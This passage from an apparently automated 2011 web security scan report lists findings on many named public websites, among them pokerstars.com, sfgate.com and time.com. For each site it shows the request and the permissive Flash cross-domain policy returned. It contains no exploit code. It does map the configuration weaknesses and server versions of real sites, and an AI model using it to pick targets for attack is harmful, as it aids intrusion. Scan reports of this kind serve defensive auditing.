The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pokerstars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:55 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 19:43:06 GMT
ETag: "5af-ece20680"
Accept-Ranges: bytes
Content-Length: 1455
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pokerstarsblog.com"/>
<allow-access-from domain="*.pokerstars.com"/>
<allow-access-from domain="*.pokerstars.pl"/>
<allow-access-from domain="*.pokerstars.es"/>
<allow-access-from domain="*.pokerstars.fi"/>
<allow-access-from domain="*.pokerstars.hu"/>
<allow-access-from domain="*.pokerstars.nl"/>
<allow-access-from domain="*.pokerstars.se"/>
<allow-access-from domain="*.pokerstars.co.uk"/>
<allow-access-from domain="*.pokerstars.it"/>
<allow-access-from domain="*.pokerstars.si"/>
<allow-access-from domain="*.pokerstars.pt"/>
<allow-access-from domain="*.pokerstars.cz"/>
<allow-access-from domain="*.appt.com"/>
<allow-access-from domain="*.europeanpokertour.com"/>
<allow-access-from domain="*.wcoop.com"/>
<allow-access-from domain="*.pokerstars.tv"/>
<allow-access-from domain="*.joehachem.com"/>
<allow-access-from domain="*.chrismoneymaker.com"/>
<allow-access-from domain="*.greg-raymer.net"/>
<allow-access-from domain="*.andre-akkari.com"/>
<allow-access-from domain="*.danielnegreanu.ca"/>
<allow-access-from domain="*.hevad-khan.com"/>
<allow-access-from domain="*.lee-nelson.net"/>
<allow-access-from domain="*.vanessa-rousso.net"/>
<allow-access-from domain="*"/>
...[SNIP]...

7.110. http://www.popularscreensavers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popularscreensavers.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
ETag: W/"241-1301508774000"
Last-Modified: Wed, 30 Mar 2011 18:12:54 GMT
Content-Length: 241
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
<allow-access-from domain="*"/>
...[SNIP]...

7.111. http://www.rawtube.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rawtube.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 May 2009 01:35:39 GMT
ETag: "820f-13b-469c13a9090c0"
Content-Type: text/xml
Content-Length: 315
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747465 862901038
Age: 3296
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.112. http://www.realsimple.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realsimple.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
Last-Modified: Tue, 06 Oct 2009 18:54:33 GMT
ETag: "2158b86-16c-47548c2caac40"
Accept-Ranges: bytes
Content-Length: 364
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*.redcated" />
<allow-access-from domain="*.atlassolutions.com" />
<allow-access-from domain="*.akamai.net" />
...[SNIP]...

7.113. http://www.redorbit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redorbit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.redorbit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 15:00:52 GMT
Accept-Ranges: bytes
Content-Length: 208
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.114. http://www.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:110f"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

7.115. http://www.sendspace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sendspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sendspace.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
ETag: "1797000725"
Last-Modified: Fri, 01 Apr 2011 07:15:01 GMT
Content-Length: 115
Connection: close
Date: Sat, 02 Apr 2011 14:08:28 GMT
Server: Apache

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.116. http://www.sfgate.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sfgate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:16 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751796195568; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Tue, 09 Jan 2007 23:06:08 GMT
ETag: "4d737b-cb-426a397623678"
Accept-Ranges: bytes
Content-Length: 203
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.117. http://www.sheknows.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sheknows.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sheknows.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:25 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
X-Served-By: app3v-sk.wuo.lax2
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.118. http://www.shockwave.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shockwave.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shockwave.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Last-Modified: Wed, 25 Feb 2009 04:02:39 GMT
ETag: "11d7972a2-109-463b64e7f35c0"
Accept-Ranges: bytes
Content-Length: 265
Content-Type: application/xml
Cache-Control: max-age=624
Expires: Sat, 02 Apr 2011 13:55:06 GMT
Date: Sat, 02 Apr 2011 13:44:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.nick.com" secure="true" />
...[SNIP]...

7.119. http://www.slideshare.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 18:28:13 GMT
Expires: Sun, 03 Apr 2011 12:32:11 GMT
Cache-Control: max-age=86400
Content-Length: 222
Date: Sat, 02 Apr 2011 13:37:27 GMT
X-Varnish: 2056362629 2055719298
Age: 3916
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />

...[SNIP]...

7.120. http://www.spike.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spike.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
Last-Modified: Wed, 23 Jun 2010 15:37:40 GMT
ETag: "5db0a-102-489b4516c1900"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:31:39 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:39 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.121. http://www.sportsnetwork.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sportsnetwork.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Date: Sat, 02 Apr 2011 13:43:06 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Mon, 20 Jul 2009 16:18:35 GMT
ETag: "d2a1a8bb559ca1:160a"
Content-Length: 202

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.122. http://www.swagbucks.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swagbucks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.swagbucks.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/xml
Last-Modified: Thu, 11 Jun 2009 18:44:34 GMT
Accept-Ranges: bytes
ETag: "48a15aac4eac91:4dd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!--http://www.swagbucks.com/content/flash/crossdomain.xml-->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.123. http://www.syfy.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.syfy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.syfy.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.12.2
Last-Modified: Mon, 14 Sep 2009 16:36:06 GMT
ETag: "9c9dd1-a3-4738c4325a980"
Accept-Ranges: bytes
Content-Length: 163
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:11:19 GMT
Date: Sat, 02 Apr 2011 14:06:19 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 14:06:19 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!-- !!!syfy!!! http://blog.scifi.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-policy>

7.124. http://www.tampabay.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tampabay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tampabay.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:39:21 GMT
Content-Type: text/xml
Connection: close
Cache-control: public,private
Last-modified: Mon, 23 Jun 2008 21:00:46 GMT
Etag: "52-48600efe"
X-Cacheable: YES
Content-Length: 82
X-Varnish: 380322934 380303585
Age: 283
Via: 1.1 varnish
X-Served-By: varnish-a
X-Cache: HIT
X-Cache-Hits: 2
X-Cache-Backend: default

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.125. http://www.tastebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tastebook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 22:16:25 GMT
Accept-Ranges: bytes
Content-Length: 146
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:14:10 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.tastebook.com/w3c/p3p.xml", CP="ALL DSP COR LAW CURa CONi OUR BUS IND PHY ONL UNI PUR COM NAV STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.126. http://www.teennick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teennick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.teennick.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: W/"2563-1301085024000"
Last-Modified: Fri, 25 Mar 2011 20:30:24 GMT
Content-Length: 2563
Content-Type: text/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 14:18:01 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 20:18:01 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mtvi.com"/>
   <allow-access-from domain="*.nick.com"/>
   <allow-access-from domain="*.nickjr.com"/>
   <allow-access-from domain="*.nickjr-d.mtvi.com"/>
   <allow-access-from domain="*.nickjr-q.mtvi.com"/>
   <allow-access-from domain="*.nickonline.com"/>
   <allow-access-from domain="*.kids.nickonline.com"/>
   <allow-access-from domain="*.addictinggames.com"/>
   <allow-access-from domain="*.shockwave.com"/>    
   <allow-access-from domain="*.nickatnite.com"/>
   <allow-access-from domain="*.nickatnight.com"/>    
   <allow-access-from domain="*.magorium.com"/>    
   <allow-access-from domain="*.doubleclick*"/>
   <allow-access-from domain="*.the-n.com"/>
   <allow-access-from domain="*.theredspace.com"/>
   <allow-access-from domain="24.222.18.26"/>
   <allow-access-from domain="*.nicktoonsnetwork.com"/>
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.biggreenhelp.com"/>
   <allow-access-from domain="*.nick.co.kr"/>
   <allow-access-from domain="*.nicktv.it"/>
   <allow-access-from domain="*.popsicle.com"/>
   <allow-access-from domain="*.mtv.pl"/>
   <allow-access-from domain="96.10.20.67"/>    
   <allow-access-from domain="*.mua.nick-d.mtvi.com"/>
   <allow-access-from domain="*.mua.nick-q.mtvi.com"/>
   <allow-access-from domain="*.mua.nick.com"/>
   <allow-access-from domain="kca.gigya.s3.amazonaws.com"/>
   <allow-access-from domain="http://testing.arkadium.com"/>
...[SNIP]...
<allow-access-from domain="*.neopets.com"/>
   <allow-access-from domain="gamestudio.sarbakangames.com"/>
   <allow-access-from domain="*.scenic-d.mtvi.com/"/>
   <allow-access-from domain="*.scenic-q.mtvi.com/"/>
   <allow-access-from domain="*.scenic-l.mtvi.com/"/>
   <allow-access-from domain="live.toptrumps.com"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.127. http://www.terra.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.terra.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.terra.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:43 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753983.130704; path=/; expires=Fri, 01-Jan-2016 00:02:22 GMT; domain=.terra.com
Last-Modified: Fri, 11 Jan 2008 15:27:05 GMT
ETag: "17bb6-91-44373f5718440"
Accept-Ranges: bytes
Content-Length: 145
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.terra.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.128. http://www.thedailybeast.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thedailybeast.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 22:58:12 GMT
ETag: "809660-112-7aae2900"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:40:10 GMT
Content-Length: 274
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.129. http://www.thedailyshow.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thedailyshow.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
Last-Modified: Mon, 09 Mar 2009 23:15:41 GMT
ETag: "20520-102-464b7d0294140"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Cache-Control: max-age=971
Expires: Sat, 02 Apr 2011 13:47:58 GMT
Date: Sat, 02 Apr 2011 13:31:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.130. http://www.theonion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theonion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.theonion.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:14 GMT
Server: PWS/1.7.1.5
X-Px: ht-d brf iad-agg-n33.panthercdn.com
ETag: "122ed-cc-4819d1d3984c0"
Cache-Control: max-age=604800
Expires: Sun, 03 Apr 2011 13:09:36 GMT
Age: 520238
Content-Length: 204
Content-Type: application/xml
Last-Modified: Fri, 12 Mar 2010 16:35:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.131. http://www.thisoldhouse.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thisoldhouse.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:08 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.132. http://www.time.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.time.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.time.com

Response

HTTP/1.1 200 OK
Server: Undisclosed-Webserver/0.1
Date: Sat, 02 Apr 2011 13:24:06 GMT
